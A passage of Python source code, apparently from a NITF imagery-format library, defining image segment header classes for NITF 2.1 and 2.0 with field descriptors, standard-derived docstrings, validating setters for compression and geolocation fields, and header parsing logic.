'IGEOLO': 60, 'IC': 2, 'COMRAT': 4, 'ISYNC': 1, 'IMODE': 1,
'NBPR': 4, 'NBPC': 4, 'NPPBH': 4, 'NPPBV': 4,
'NBPP': 2, 'IDLVL': 3, 'IALVL': 3, 'ILOC': 10,
'IMAG': 4, 'UDIDL': 5, 'IXSHDL': 5}
# Descriptors
IM = _StringEnumDescriptor(
'IM', True, 2, {'IM', }, default_value='IM',
docstring='File part type.') # type: str
IID1 = _StringDescriptor(
'IID1', True, 10, default_value='',
docstring='Image Identifier 1. This field shall contain a valid alphanumeric identification code '
'associated with the image. The valid codes are determined by '
'the application.') # type: str
IDATIM = _StringDescriptor(
'IDATIM', True, 14, default_value='',
docstring='Image Date and Time. This field shall contain the time (UTC) of the image '
'acquisition in the format :code:`YYYYMMDDhhmmss`.') # type: str
TGTID = _StringDescriptor(
'TGTID', True, 17, default_value='',
docstring='Target Identifier. This field shall contain the identification of the primary target '
'in the format, :code:`BBBBBBBBBBOOOOOCC`, consisting of ten characters of Basic Encyclopedia '
'`(BE)` identifier, followed by five characters of facility OSUFFIX, followed by the two '
'character country code as specified in FIPS PUB 10-4.') # type: str
IID2 = _StringDescriptor(
'IID2', True, 80, default_value='',
docstring='Image Identifier 2. This field can contain the identification of additional '
'information about the image.') # type: str
Security = _NITFElementDescriptor(
'Security', True, NITFSecurityTags, default_args={},
docstring='The image security tags.') # type: NITFSecurityTags
ENCRYP = _StringEnumDescriptor(
'ENCRYP', True, 1, {'0'}, default_value='0',
docstring='Encryption.') # type: str
ISORCE = _StringDescriptor(
'ISORCE', True, 42, default_value='',
docstring='Image Source. This field shall contain a description of the source of the image. '
'If the source of the data is classified, then the description shall be preceded by '
'the classification, including codeword(s).') # type: str
NROWS = _IntegerDescriptor(
'NROWS', True, 8, default_value=0,
docstring='Number of Significant Rows in Image. This field shall contain the total number of rows '
'of significant pixels in the image. When the product of the values of the `NPPBV` field '
'and the `NBPC` field is greater than the value of the `NROWS` field '
r'(:math:`NPPBV \cdot NBPC > NROWS`), the rows indexed with the value of the `NROWS` field '
r'to (:math:`NPPBV\cdot NBPC - 1`) shall contain fill data. NOTE: Only the rows indexed '
'0 to the value of the `NROWS` field minus 1 of the image contain significant data. '
'The pixel fill values are determined by the application.') # type: int
NCOLS = _IntegerDescriptor(
'NCOLS', True, 8, default_value=0,
docstring='Number of Significant Columns in Image. This field shall contain the total number of '
'columns of significant pixels in the image. When the product of the values of the `NPPBH` '
'field and the `NBPR` field is greater than the `NCOLS` field '
r'(:math:`NPPBH\cdot NBPR > NCOLS`), the columns indexed with the value of the `NCOLS` field '
r'to (:math:`NPPBH\cdot NBPR - 1`) shall contain fill data. NOTE: Only the columns '
'indexed 0 to the value of the `NCOLS` field minus 1 of the image contain significant data. '
'The pixel fill values are determined by the application.') # type: int
PVTYPE = _StringEnumDescriptor(
'PVTYPE', True, 3, {'INT', 'B', 'SI', 'R', 'C'},
docstring='Pixel Value Type. This field shall contain an indicator of the type of computer representation '
'used for the value for each pixel for each band in the image. ') # type: str
IREP = _StringEnumDescriptor(
'IREP', True, 8,
{'MONO', 'RGB', 'RGB/LUT', 'MULTI', 'NODISPLY', 'NVECTOR', 'POLAR', 'VPH', 'YCbCr601'},
default_value='NODISPLY',
docstring='Image Representation. This field shall contain a valid indicator of the processing required '
'in order to display an image.') # type: str
ICAT = _StringDescriptor(
'ICAT', True, 8, default_value='SAR',
docstring='Image Category. This field shall contain a valid indicator of the specific category of image, '
'raster or grid data. The specific category of an IS reveals its intended use or the nature '
'of its collector.') # type: str
ABPP = _IntegerDescriptor(
'ABPP', True, 2,
docstring='Actual Bits-Per-Pixel Per Band. This field shall contain the number of "significant bits" for '
'the value in each band of each pixel without compression. Even when the image is compressed, '
'`ABPP` contains the number of significant bits per pixel that were present in the image '
'before compression. This field shall be less than or equal to Number of Bits Per Pixel '
'(field `NBPP`). The number of adjacent bits within each `NBPP` is '
'used to represent the value.') # type: int
PJUST = _StringEnumDescriptor(
'PJUST', True, 1, {'L', 'R'}, default_value='R',
docstring='Pixel Justification. When `ABPP` is not equal to `NBPP`, this field indicates whether the '
'significant bits are left justified (:code:`L`) or right '
'justified (:code:`R`).') # type: str
ICORDS = _StringEnumDescriptor(
'ICORDS', True, 1, {'', 'U', 'G', 'N', 'S', 'D'}, default_value='G',
docstring='Image Coordinate Representation. This field shall contain a valid code indicating the type '
'of coordinate representation used for providing an approximate location of the image in the '
'Image Geographic Location field (`IGEOLO`).') # type: str
Comments = _NITFElementDescriptor(
'Comments', True, ImageComments, default_args={},
docstring='The image comments.') # type: ImageComments
Bands = _NITFElementDescriptor(
'Bands', True, ImageBands, default_args={},
docstring='The image bands.') # type: ImageBands
ISYNC = _IntegerDescriptor(
'ISYNC', True, 1, default_value=0,
docstring='Image Sync code. This field is reserved for future use. ') # type: int
IMODE = _StringEnumDescriptor(
'IMODE', True, 1, {'B', 'P', 'R', 'S'}, default_value='P',
docstring='Image Mode. This field shall indicate how the Image Pixels are '
'stored in the NITF file.') # type: str
NBPR = _IntegerDescriptor(
'NBPR', True, 4, default_value=1,
docstring='Number of Blocks Per Row. This field shall contain the number of image blocks in a row of '
'blocks (paragraph 5.4.2.2) in the horizontal direction. If the image consists of only a '
'single block, this field shall contain the value one.') # type: int
NBPC = _IntegerDescriptor(
'NBPC', True, 4, default_value=1,
docstring='Number of Blocks Per Column. This field shall contain the number of image blocks in a column '
'of blocks (paragraph 5.4.2.2) in the vertical direction. If the image consists of only a '
'single block, this field shall contain the value one.') # type: int
NPPBH = _IntegerDescriptor(
'NPPBH', True, 4, default_value=0,
docstring='Number of Pixels Per Block Horizontal. This field shall contain the number of pixels horizontally '
'in each block of the image. It shall be the case that the product of the values of the `NBPR` '
'field and the `NPPBH` field is greater than or equal to the value of the `NCOLS` field '
r'(:math:`NBPR\cdot NPPBH \geq NCOLS`). When NBPR is :code:`1`, setting the `NPPBH` '
'value to :code:`0` designates that the number of pixels horizontally is specified by the '
'value in NCOLS.') # type: int
NPPBV = _IntegerDescriptor(
'NPPBV', True, 4, default_value=0,
docstring='Number of Pixels Per Block Vertical. This field shall contain the number of pixels vertically '
'in each block of the image. It shall be the case that the product of the values of the `NBPC` '
'field and the `NPPBV` field is greater than or equal to the value of the `NROWS` field '
r'(:math:`NBPC\cdot NPPBV \geq NROWS`). When `NBPC` is :code:`1`, setting the `NPPBV` value '
r'to :code:`0` designates that the number of pixels vertically is specified by '
r'the value in `NROWS`.') # type: int
NBPP = _IntegerDescriptor(
'NBPP', True, 2, default_value=0,
docstring='Number of Bits Per Pixel Per Band.') # type: int
IDLVL = _IntegerDescriptor(
'IDLVL', True, 3, default_value=0,
docstring='Image Display Level. This field shall contain a valid value that indicates the display level of '
'the image relative to other displayed file components in a composite display. The valid values '
'are :code:`1-999`. The display level of each displayable segment (image or graphic) within a file '
'shall be unique.') # type: int
IALVL = _IntegerDescriptor(
'IALVL', True, 3, default_value=0,
docstring='Attachment Level. This field shall contain a valid value that indicates the attachment '
'level of the image.') # type: int
ILOC = _StringDescriptor(
'ILOC', True, 10, default_value='',
docstring='Image Location. The image location is the location of the first pixel of the first line of the '
'image. This field shall contain the image location offset from the `ILOC` or `SLOC` value '
'of the segment to which the image is attached or from the origin of the CCS when the image '
'is unattached (`IALVL` contains :code:`0`). A row or column value of :code:`0` indicates no offset. '
'Positive row and column values indicate offsets down and to the right while negative row and '
'column values indicate offsets up and to the left.') # type: str
IMAG = _StringDescriptor(
'IMAG', True, 4, default_value='1.0',
docstring='Image Magnification. This field shall contain the magnification (or reduction) factor of the '
'image relative to the original source image. Decimal values are used to indicate magnification, '
'and decimal fraction values indicate reduction. For example, :code:`2.30` indicates the original '
'image has been magnified by a factor of :code:`2.30`, while :code:`0.5` indicates '
'the original image has been reduced by a factor of 2.') # type: str
UserHeader = _NITFElementDescriptor(
'UserHeader', True, UserHeaderType, default_args={},
docstring='User defined header.') # type: UserHeaderType
ExtendedHeader = _NITFElementDescriptor(
'ExtendedHeader', True, UserHeaderType, default_args={},
docstring='Extended subheader - TRE list.') # type: UserHeaderType
def __init__(self, **kwargs):
    """
    Parameters
    ----------
    kwargs
        The field values, keyed on the names in `_ordering`.
    """

    # conditional/validated fields are backed by private attributes that
    # the property setters below manage
    self._IC = None
    self._COMRAT = None
    self._IGEOLO = None
    self._mask_subheader = None
    super(ImageSegmentHeader, self).__init__(**kwargs)
@property
def is_masked(self):
    """
    bool: Does this image segment contain a mask?
    """

    # NM plus the whole M* family indicate a mask is present
    return self.IC in ('NM', 'M1', 'M3', 'M4', 'M5', 'M6', 'M7', 'M8')
@property
def is_compressed(self):
    """
    bool: Is this image segment compressed?
    """

    # only NC (no compression) and NM (uncompressed, masked) are uncompressed
    uncompressed_codes = ('NC', 'NM')
    return self.IC not in uncompressed_codes
@property
def IC(self):
    """
    str: Image Compression. This field shall contain a valid code indicating
    the form of compression used in representing the image data.

    Valid values are :code:`C1` (bi-level), :code:`C3` (JPEG), :code:`C4`
    (Vector Quantization), :code:`C5` (lossless JPEG), :code:`I1`
    (down sampled JPEG), and :code:`NC` (not compressed). Also valid are
    :code:`M1, M3, M4`, and :code:`M5` for compressed images, and :code:`NM`
    for uncompressed images, indicating an image that contains a block
    mask and/or a pad pixel mask. :code:`C6` and :code:`M6` are reserved
    values for a future correlated multicomponent compression algorithm,
    and :code:`C7` and :code:`M7` for a future complex SAR compression.
    :code:`C8` and :code:`M8` are the values for ISO standard compression
    JPEG 2000 (ISO/IEC 15444-1:2000 with amendments 1 and 2).

    The format of a mask image is identical to the format of its
    corresponding non-masked image, except for the presence of an Image
    Data Mask at the beginning of the image data area - see paragraph
    5.4.3.2 and table A-3(A) of MIL-STD-2500C. The compression schemes for
    codes :code:`C1/M1, C3/M3, C4/M4, C5/M5` are defined, respectively, in
    ITU-T T.4 AMD2, MIL-STD-188-198A, MIL-STD-188-199, and NGA N0106-97
    (which also defines :code:`I1`). NOTE: :code:`C2` (ARIDPCM) is not
    valid in NITF 2.1.
    """

    return self._IC

@IC.setter
def IC(self, value):
    value = _parse_str(value, 2, 'NC', 'IC', self)
    if value not in {
            'NC', 'NM', 'C0', 'C1', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'I1',
            'M1', 'M3', 'M4', 'M5', 'M6', 'M7', 'M8'}:
        raise ValueError('IC got invalid value {}'.format(value))
    self._IC = value
    if value in ('NC', 'NM'):
        # uncompressed codes carry no compression rate field
        self._COMRAT = None
    elif self._COMRAT is None:
        # a compressed code requires COMRAT to be present - initialize a
        # missing COMRAT to the 4-character space-fill placeholder.
        # NB: fixed from `is not None`, which clobbered any COMRAT already
        # set and left a missing COMRAT unpopulated.
        self._COMRAT = '\x20'*4
@property
def COMRAT(self):
    """
    None|str: Compression Rate Code. When the `IC` field contains one of
    :code:`C1, C3, C4, C5, C8, M1, M3, M4, M5, M8, I1`, this field contains
    a code indicating the compression rate for the image. When `IC` is
    :code:`NC` or :code:`NM`, this is :code:`None`.
    """

    return self._COMRAT

@COMRAT.setter
def COMRAT(self, value):
    value = _parse_str(value, 4, None, 'COMRAT', self)
    uncompressed = self.IC in ('NC', 'NM')
    if value is None and not uncompressed:
        # a compressed IC code demands a COMRAT entry - space-fill it
        value = '\x20'*4
        logger.error(
            'COMRAT value is None, but IC is not in {"NC", "NM"}.\n\t'
            'This must be resolved.')
    if value is not None and uncompressed:
        # an uncompressed IC code forbids a COMRAT entry - drop it
        value = None
        logger.error(
            'COMRAT value is something other than None, but IC in {"NC", "NM"}.\n\t'
            'This is invalid, and COMRAT is being set to None.')
    self._COMRAT = value
@property
def IGEOLO(self):
    """
    None|str: Image Geographic Location. This field, when present, contains
    an approximate geographic location which is not intended for analytical
    purposes (e.g. targeting, mensuration, distance calculation); it is
    intended to support general user appreciation of the image location
    (e.g. cataloguing). The representation of the corner locations is
    specified in the `ICORDS` field. The four corners of the (significant)
    image data are given in image coordinate order:
    (0, 0), (0, MaxCol), (MaxRow, MaxCol), (MaxRow, 0), where MaxCol and
    MaxRow are determined, respectively, from the `NCOLS` and `NROWS` fields.
    """

    return self._IGEOLO

@IGEOLO.setter
def IGEOLO(self, value):
    value = _parse_str(value, 60, None, 'IGEOLO', self)
    icords_populated = (self.ICORDS.strip() != '')
    if icords_populated and value is None:
        # ICORDS promises a geolocation - space-fill the 60 characters
        value = '\x20'*60
    elif not icords_populated and value is not None:
        # no coordinate representation declared, so no geolocation is recorded
        value = None
    self._IGEOLO = value
@property
def mask_subheader(self):
    # type: () -> Union[None, MaskSubheader]
    """
    None|MaskSubheader: The mask subheader, if it has been appended.
    """

    return self._mask_subheader

@mask_subheader.setter
def mask_subheader(self, value):
    if value is None:
        self._mask_subheader = None
        return

    if not isinstance(value, MaskSubheader):
        raise ValueError(
            'mask_subheader is expected to be an instance of MaskSubheader. '
            'Got type {}'.format(type(value)))
    # a mask subheader only makes sense for the masked compression codes
    if not self.is_masked:
        raise ValueError(
            'IC={}, which does not indicate the presence of a mask '
            'subheader'.format(self.IC))
    self._mask_subheader = value
def _get_attribute_length(self, fld):
    """
    Get the length in bytes that the given field occupies when serialized.
    """

    if fld not in ('COMRAT', 'IGEOLO'):
        return super(ImageSegmentHeader, self)._get_attribute_length(fld)
    # COMRAT and IGEOLO are conditional fields - when absent they
    # contribute no bytes to the serialized header
    return 0 if getattr(self, '_'+fld) is None else self._lengths[fld]
@classmethod
def minimum_length(cls):
    """
    int: The minimum possible serialized size of this header.
    """

    # COMRAT (4 bytes) and IGEOLO (60 bytes) are conditional and may be
    # absent, so subtract 64 from the parent's total
    return super(ImageSegmentHeader, cls).minimum_length() - 64
@classmethod
def _parse_attribute(cls, fields, attribute, value, start):
    """
    Parse the given attribute from the bytes buffer `value` starting at
    offset `start`, record it in the `fields` dictionary, and return the
    offset at which the next attribute begins.
    """

    if attribute == 'IC':
        val = value[start:start+2].decode('utf-8')
        fields['IC'] = val
        if val in ('NC', 'NM'):
            # uncompressed codes carry no COMRAT field in the buffer
            fields['COMRAT'] = None
        return start+2
    elif attribute == 'ICORDS':
        # NOTE(review): ICORDS is stored as raw bytes here, while IC above
        # is decoded to str - presumably downstream parsing accepts both;
        # verify against the descriptor implementation.
        fields['ICORDS'] = value[start:start+1]
        if fields['ICORDS'] == b' ':
            # a blank ICORDS indicates no IGEOLO field follows (NITF 2.1)
            fields['IGEOLO'] = None
        return start+1
    else:
        return super(ImageSegmentHeader, cls)._parse_attribute(fields, attribute, value, start)
#########
# NITF 2.0 version
class ImageSegmentHeader0(NITFElement):
"""
The image segment header for NITF version 2.0 - see standards document
MIL-STD-2500A for more information.
"""
_ordering = (
'IM', 'IID', 'IDATIM', 'TGTID',
'ITITLE', 'Security', 'ENCRYP', 'ISORCE',
'NROWS', 'NCOLS', 'PVTYPE', 'IREP',
'ICAT', 'ABPP', 'PJUST', 'ICORDS',
'IGEOLO', 'Comments', 'IC', 'COMRAT', 'Bands',
'ISYNC', 'IMODE', 'NBPR', 'NBPC', 'NPPBH',
'NPPBV', 'NBPP', 'IDLVL', 'IALVL',
'ILOC', 'IMAG', 'UserHeader', 'ExtendedHeader')
_lengths = {
'IM': 2, 'IID': 10, 'IDATIM': 14, 'TGTID': 17,
'ITITLE': 80, 'ENCRYP': 1, 'ISORCE': 42,
'NROWS': 8, 'NCOLS': 8, 'PVTYPE': 3, 'IREP': 8,
'ICAT': 8, 'ABPP': 2, 'PJUST': 1, 'ICORDS': 1,
'IGEOLO': 60, 'IC': 2, 'COMRAT': 4, 'ISYNC': 1, 'IMODE': 1,
'NBPR': 4, 'NBPC': 4, 'NPPBH': 4, 'NPPBV': 4,
'NBPP': 2, 'IDLVL': 3, 'IALVL': 3, 'ILOC': 10,
'IMAG': 4, 'UDIDL': 5, 'IXSHDL': 5}
# Descriptors
IM = _StringEnumDescriptor(
'IM', True, 2, {'IM', }, default_value='IM',
docstring='File part type.') # type: str
IID = _StringDescriptor(
'IID', True, 10, default_value='',
docstring='Image Identifier 1. This field shall contain a valid alphanumeric identification code '
'associated with the image. The valid codes are determined by '
'the application.') # type: str
IDATIM = _StringDescriptor(
'IDATIM', True, 14, default_value='',
docstring='Image Date and Time. This field shall contain the time (UTC) of the image '
'acquisition in the format :code:`YYYYMMDDhhmmss`.') # type: str
TGTID = _StringDescriptor(
'TGTID', True, 17, default_value='',
docstring='Target Identifier. This field shall contain the identification of the primary target '
'in the format, :code:`BBBBBBBBBBOOOOOCC`, consisting of ten characters of Basic Encyclopedia '
'`(BE)` identifier, followed by five characters of facility OSUFFIX, followed by the two '
'character country code as specified in FIPS PUB 10-4.') # type: str
ITITLE = _StringDescriptor(
'ITITLE', True, 80, default_value='',
docstring='Image Identifier 2. This field can contain the identification of additional '
'information about the image.') # type: str
Security = _NITFElementDescriptor(
'Security', True, NITFSecurityTags0, default_args={},
docstring='The image security tags.') # type: NITFSecurityTags0
ENCRYP = _StringEnumDescriptor(
'ENCRYP', True, 1, {'0'}, default_value='0',
docstring='Encryption.') # type: str
ISORCE = _StringDescriptor(
'ISORCE', True, 42, default_value='',
docstring='Image Source. This field shall contain a description of the source of the image. '
'If the source of the data is classified, then the description shall be preceded by '
'the classification, including codeword(s).') # type: str
NROWS = _IntegerDescriptor(
'NROWS', True, 8, default_value=0,
docstring='Number of Significant Rows in Image. This field shall contain the total number of rows '
'of significant pixels in the image. When the product of the values of the `NPPBV` field '
'and the `NBPC` field is greater than the value of the `NROWS` field '
r'(:math:`NPPBV \cdot NBPC > NROWS`), the rows indexed with the value of the `NROWS` field '
r'to (:math:`NPPBV\cdot NBPC - 1`) shall contain fill data. NOTE: Only the rows indexed '
'0 to the value of the `NROWS` field minus 1 of the image contain significant data. '
'The pixel fill values are determined by the application.') # type: int
NCOLS = _IntegerDescriptor(
'NCOLS', True, 8, default_value=0,
docstring='Number of Significant Columns in Image. This field shall contain the total number of '
'columns of significant pixels in the image. When the product of the values of the `NPPBH` '
'field and the `NBPR` field is greater than the `NCOLS` field '
r'(:math:`NPPBH\cdot NBPR > NCOLS`), the columns indexed with the value of the `NCOLS` field '
r'to (:math:`NPPBH\cdot NBPR - 1`) shall contain fill data. NOTE: Only the columns '
'indexed 0 to the value of the `NCOLS` field minus 1 of the image contain significant data. '
'The pixel fill values are determined by the application.') # type: int
PVTYPE = _StringEnumDescriptor(
'PVTYPE', True, 3, {'INT', 'B', 'SI', 'R', 'C'},
docstring='Pixel Value Type. This field shall contain an indicator of the type of computer representation '
'used for the value for each pixel for each band in the image. ') # type: str
IREP = _StringEnumDescriptor(
'IREP', True, 8,
{'MONO', 'RGB', 'RGB/LUT', 'MULTI', 'NODISPLY', 'NVECTOR', 'POLAR', 'VPH', 'YCbCr601'},
default_value='NODISPLY',
docstring='Image Representation. This field shall contain a valid indicator of the processing required '
'in order to display an image.') # type: str
ICAT = _StringDescriptor(
'ICAT', True, 8, default_value='SAR',
docstring='Image Category. This field shall contain a valid indicator of the specific category of image, '
'raster or grid data. The specific category of an IS reveals its intended use or the nature '
'of its collector.') # type: str
ABPP = _IntegerDescriptor(
'ABPP', True, 2,
docstring='Actual Bits-Per-Pixel Per Band. This field shall contain the number of "significant bits" for '
'the value in each band of each pixel without compression. Even when the image is compressed, '
'`ABPP` contains the number of significant bits per pixel that were present in the image '
'before compression. This field shall be less than or equal to Number of Bits Per Pixel '
'(field `NBPP`). The number of adjacent bits within each `NBPP` is '
'used to represent the value.') # type: int
PJUST = _StringEnumDescriptor(
'PJUST', True, 1, {'L', 'R'}, default_value='R',
docstring='Pixel Justification. When `ABPP` is not equal to `NBPP`, this field indicates whether the '
'significant bits are left justified (:code:`L`) or right '
'justified (:code:`R`).') # type: str
ICORDS = _StringEnumDescriptor(
'ICORDS', True, 1, {'U', 'G', 'C', 'N'}, default_value='G',
docstring='Image Coordinate Representation. This field shall contain a valid code indicating the type '
'of coordinate representation used for providing an approximate location of the image in the '
'Image Geographic Location field (`IGEOLO`).') # type: str
Comments = _NITFElementDescriptor(
'Comments', True, ImageComments, default_args={},
docstring='The image comments.') # type: ImageComments
Bands = _NITFElementDescriptor(
'Bands', True, ImageBands, default_args={},
docstring='The image bands.') # type: ImageBands
ISYNC = _IntegerDescriptor(
'ISYNC', True, 1, default_value=0,
docstring='Image Sync code. This field is reserved for future use. ') # type: int
IMODE = _StringEnumDescriptor(
'IMODE', True, 1, {'B', 'P', 'R', 'S'}, default_value='P',
docstring='Image Mode. This field shall indicate how the Image Pixels are '
'stored in the NITF file.') # type: str
NBPR = _IntegerDescriptor(
'NBPR', True, 4, default_value=1,
docstring='Number of Blocks Per Row. This field shall contain the number of image blocks in a row of '
'blocks (paragraph 5.4.2.2) in the horizontal direction. If the image consists of only a '
'single block, this field shall contain the value one.') # type: int
NBPC = _IntegerDescriptor(
'NBPC', True, 4, default_value=1,
docstring='Number of Blocks Per Column. This field shall contain the number of image blocks in a column '
'of blocks (paragraph 5.4.2.2) in the vertical direction. If the image consists of only a '
'single block, this field shall contain the value one.') # type: int
NPPBH = _IntegerDescriptor(
'NPPBH', True, 4, default_value=0,
docstring='Number of Pixels Per Block Horizontal. This field shall contain the number of pixels horizontally '
'in each block of the image. It shall be the case that the product of the values of the `NBPR` '
'field and the `NPPBH` field is greater than or equal to the value of the `NCOLS` field '
r'(:math:`NBPR\cdot NPPBH \geq NCOLS`). When NBPR is :code:`1`, setting the `NPPBH` '
'value to :code:`0` designates that the number of pixels horizontally is specified by the '
'value in NCOLS.') # type: int
NPPBV = _IntegerDescriptor(
'NPPBV', True, 4, default_value=0,
docstring='Number of Pixels Per Block Vertical. This field shall contain the number of pixels vertically '
'in each block of the image. It shall be the case that the product of the values of the `NBPC` '
'field and the `NPPBV` field is greater than or equal to the value of the `NROWS` field '
r'(:math:`NBPC\cdot NPPBV \geq NROWS`). When `NBPC` is :code:`1`, setting the `NPPBV` value '
r'to :code:`0` designates that the number of pixels vertically is specified by '
r'the value in `NROWS`.') # type: int
NBPP = _IntegerDescriptor(
'NBPP', True, 2, default_value=0,
docstring='Number of Bits Per Pixel Per Band.') # type: int
IDLVL = _IntegerDescriptor(
'IDLVL', True, 3, default_value=0,
docstring='Image Display Level. This field shall contain a valid value that indicates the display level of '
'the image relative to other displayed file components in a composite display. The valid values '
'are :code:`1-999`. The display level of each displayable segment (image or graphic) within a file '
'shall be unique.') # type: int
IALVL = _IntegerDescriptor(
'IALVL', True, 3, default_value=0,
docstring='Attachment Level. This field shall contain a valid value that indicates the attachment '
'level of the image.') # type: int
ILOC = _StringDescriptor(
'ILOC', True, 10, default_value='',
docstring='Image Location. The image location is the location of the first pixel of the first line of the '
'image. This field shall contain the image location offset from the `ILOC` or `SLOC` value '
'of the segment to which the image is attached or from the origin of the CCS when the image '
'is unattached (`IALVL` contains :code:`0`). A row or column value of :code:`0` indicates no offset. '
'Positive row and column values indicate offsets down and to the right while negative row and '
'column values indicate offsets up and to the left.') # type: str
IMAG = _StringDescriptor(
'IMAG', True, 4, default_value='1.0',
docstring='Image Magnification. This field shall contain the magnification (or reduction) factor of the '
'image relative to the original source image. Decimal values are used to indicate magnification, '
'and decimal fraction values indicate reduction. For example, :code:`2.30` indicates the original '
'image has been magnified by a factor of :code:`2.30`, while :code:`0.5` indicates '
'the original image has been reduced by a factor of 2.') # type: str
UserHeader = _NITFElementDescriptor(
'UserHeader', True, UserHeaderType, default_args={},
docstring='User defined header.') # type: UserHeaderType
ExtendedHeader = _NITFElementDescriptor(
'ExtendedHeader', True, UserHeaderType, default_args={},
docstring='Extended subheader - TRE list.') # type: UserHeaderType
def __init__(self, **kwargs):
    """
    Parameters
    ----------
    kwargs
        The field values, keyed on the names in `_ordering`.
    """

    # conditional/validated fields are backed by private attributes that
    # the property setters below manage
    self._IC = None
    self._COMRAT = None
    self._IGEOLO = None
    self._mask_subheader = None
    super(ImageSegmentHeader0, self).__init__(**kwargs)
@property
def is_masked(self):
    """
    bool: Does this image segment contain a mask?
    """

    # the masked codes are NM plus the M* family
    masked_codes = ('NM', 'M1', 'M3', 'M4', 'M5', 'M6', 'M7', 'M8')
    return self.IC in masked_codes
@property
def is_compressed(self):
    """
    bool: Is this image segment compressed?
    """

    # anything other than NC/NM is a compressed code
    return self.IC not in ('NC', 'NM')
@property
def IC(self):
    """
    str: Image Compression. This field shall contain a valid code indicating
    the form of compression used in representing the image data.

    Valid values are :code:`C1` (bi-level), :code:`C3` (JPEG), :code:`C4`
    (Vector Quantization), :code:`C5` (lossless JPEG), :code:`I1`
    (down sampled JPEG), and :code:`NC` (not compressed). Also valid are
    :code:`M1, M3, M4`, and :code:`M5` for compressed images, and :code:`NM`
    for uncompressed images, indicating an image that contains a block
    mask and/or a pad pixel mask. :code:`C6` and :code:`M6` are reserved
    values for a future correlated multicomponent compression algorithm,
    and :code:`C7` and :code:`M7` for a future complex SAR compression.
    :code:`C8` and :code:`M8` are the values for ISO standard compression
    JPEG 2000 (ISO/IEC 15444-1:2000 with amendments 1 and 2).

    The format of a mask image is identical to the format of its
    corresponding non-masked image, except for the presence of an Image
    Data Mask at the beginning of the image data area. The compression
    schemes for codes :code:`C1/M1, C3/M3, C4/M4, C5/M5` are defined,
    respectively, in ITU-T T.4 AMD2, MIL-STD-188-198A, MIL-STD-188-199,
    and NGA N0106-97 (which also defines :code:`I1`).
    """

    return self._IC

@IC.setter
def IC(self, value):
    value = _parse_str(value, 2, 'NC', 'IC', self)
    if value not in {
            'NC', 'NM', 'C1', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'I1',
            'M1', 'M3', 'M4', 'M5', 'M6', 'M7', 'M8'}:
        raise ValueError('IC got invalid value {}'.format(value))
    self._IC = value
    if value in ('NC', 'NM'):
        # uncompressed codes carry no compression rate field
        self._COMRAT = None
    elif self._COMRAT is None:
        # a compressed code requires COMRAT to be present - initialize a
        # missing COMRAT to the 4-character space-fill placeholder.
        # NB: fixed from `is not None`, which clobbered any COMRAT already
        # set and left a missing COMRAT unpopulated.
        self._COMRAT = '\x20'*4
@property
def COMRAT(self):
    """
    None|str: Compression Rate Code. When the `IC` field contains one of
    :code:`C1, C3, C4, C5, C8, M1, M3, M4, M5, M8, I1`, this field contains
    a code indicating the compression rate for the image. When `IC` is
    :code:`NC` or :code:`NM`, this is :code:`None`.
    """

    return self._COMRAT

@COMRAT.setter
def COMRAT(self, value):
    value = _parse_str(value, 4, None, 'COMRAT', self)
    uncompressed = self.IC in ('NC', 'NM')
    if value is None and not uncompressed:
        # a compressed IC code demands a COMRAT entry - space-fill it
        value = '\x20'*4
        logger.error(
            'COMRAT value is None, but IC is not in {"NC", "NM"}.\n\t'
            'This must be resolved.')
    if value is not None and uncompressed:
        # an uncompressed IC code forbids a COMRAT entry - drop it
        value = None
        logger.error(
            'COMRAT value is something other than None, but IC in {"NC", "NM"}.\n\t'
            'This is invalid, and COMRAT is being set to None.')
    self._COMRAT = value
@property
def IGEOLO(self):
    """
    None|str: Image Geographic Location. This field, when present, contains
    an approximate geographic location which is not intended for analytical
    purposes (e.g. targeting, mensuration, distance calculation); it is
    intended to support general user appreciation of the image location
    (e.g. cataloguing). The representation of the corner locations is
    specified in the `ICORDS` field. The four corners of the (significant)
    image data are given in image coordinate order:
    (0, 0), (0, MaxCol), (MaxRow, MaxCol), (MaxRow, 0), where MaxCol and
    MaxRow are determined, respectively, from the `NCOLS` and `NROWS` fields.
    """

    return self._IGEOLO

@IGEOLO.setter
def IGEOLO(self, value):
    value = _parse_str(value, 60, None, 'IGEOLO', self)
    icords_populated = (self.ICORDS.strip() != '')
    if icords_populated and value is None:
        # ICORDS promises a geolocation - space-fill the 60 characters
        value = '\x20'*60
    elif not icords_populated and value is not None:
        # no coordinate representation declared, so no geolocation is recorded
        value = None
    self._IGEOLO = value
@property
def mask_subheader(self):
    # type: () -> Union[None, MaskSubheader]
    """
    None|MaskSubheader: The mask subheader, if it has been appended.
    """

    return self._mask_subheader

@mask_subheader.setter
def mask_subheader(self, value):
    if value is None:
        self._mask_subheader = None
        return

    if not isinstance(value, MaskSubheader):
        raise ValueError(
            'mask_subheader is expected to be an instance of MaskSubheader. '
            'Got type {}'.format(type(value)))
    # a mask subheader only makes sense for the masked compression codes
    if not self.is_masked:
        raise ValueError(
            'IC={}, which does not indicate the presence of a mask '
            'subheader'.format(self.IC))
    self._mask_subheader = value
def _get_attribute_length(self, fld):
if fld in ['COMRAT', 'IGEOLO']:
if getattr(self, '_'+fld) is None:
return 0
else:
return self._lengths[fld]
else:
return super(ImageSegmentHeader0, self)._get_attribute_length(fld)
@classmethod
def minimum_length(cls):
    # COMRAT (4 bytes) and IGEOLO (60 bytes) are conditional and may both
    # be absent, so the minimum is 64 bytes less than the parent's minimum.
    return super(ImageSegmentHeader0, cls).minimum_length() - 64
@classmethod
def _parse_attribute(cls, fields, attribute, value, start):
    """
    Parse a single attribute out of the raw header bytes, returning the
    offset just past the consumed portion.

    `IC` and `ICORDS` get special handling because their values determine
    whether the conditional `COMRAT`/`IGEOLO` fields are present at all;
    everything else is delegated to the parent implementation.
    """

    if attribute == 'IC':
        compression = value[start:start+2].decode('utf-8')
        fields['IC'] = compression
        # No compression (NC) or masked-uncompressed (NM) => no COMRAT.
        if compression in ('NC', 'NM'):
            fields['COMRAT'] = None
        return start + 2
    if attribute == 'ICORDS':
        # NOTE(review): ICORDS is kept as raw bytes here while IC is
        # decoded to str - presumably a later normalization step decodes
        # it; confirm against the field setters.
        fields['ICORDS'] = value[start:start+1]
        # ICORDS of b'N' means no geolocation, so IGEOLO is absent.
        if fields['ICORDS'] == b'N':
            fields['IGEOLO'] = None
        return start + 1
    return super(ImageSegmentHeader0, cls)._parse_attribute(fields, attribute, value, start)
